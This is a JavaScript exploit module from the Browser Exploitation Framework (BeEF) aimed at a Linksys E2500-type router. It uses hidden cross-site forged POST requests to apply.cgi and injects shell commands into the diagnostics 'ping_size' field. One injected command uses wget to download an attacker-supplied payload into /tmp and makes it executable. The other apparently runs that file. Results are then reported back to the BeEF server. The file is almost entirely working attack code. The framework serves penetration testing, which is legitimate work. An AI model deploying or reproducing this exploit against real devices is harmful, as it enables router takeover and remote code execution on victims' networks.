// // Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var payload = '<%= @payload %>'; var random = Math.random().toString(36).substring(7); var timeout = 15; var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} , {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'}, {'type':'hidden', 'name':'submit_type', 'value':'start_ping'}, {'type':'hidden', 'name':'action', 'value':''}, {'type':'hidden', 'name':'commit', 'value':'0'}, {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'}, {'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'}, {'type':'hidden', 'name':'ping_times', 'value':'5'}, {'type':'hidden', 'name':'traceroute_ip', 'value':''}, ]); var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} , {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'}, {'type':'hidden', 'name':'submit_type', 'value':'start_ping'}, {'type':'hidden', 'name':'action', 'value':''}, {'type':'hidden', 'name':'commit', 'value':'0'}, {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'}, {'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'}, {'type':'hidden', 'name':'ping_times', 'value':'5'}, {'type':'hidden', 'name':'traceroute_ip', 'value':''}, ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(e2500_iframe_1<%= @command_id %>); document.body.removeChild(e2500_iframe_2<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });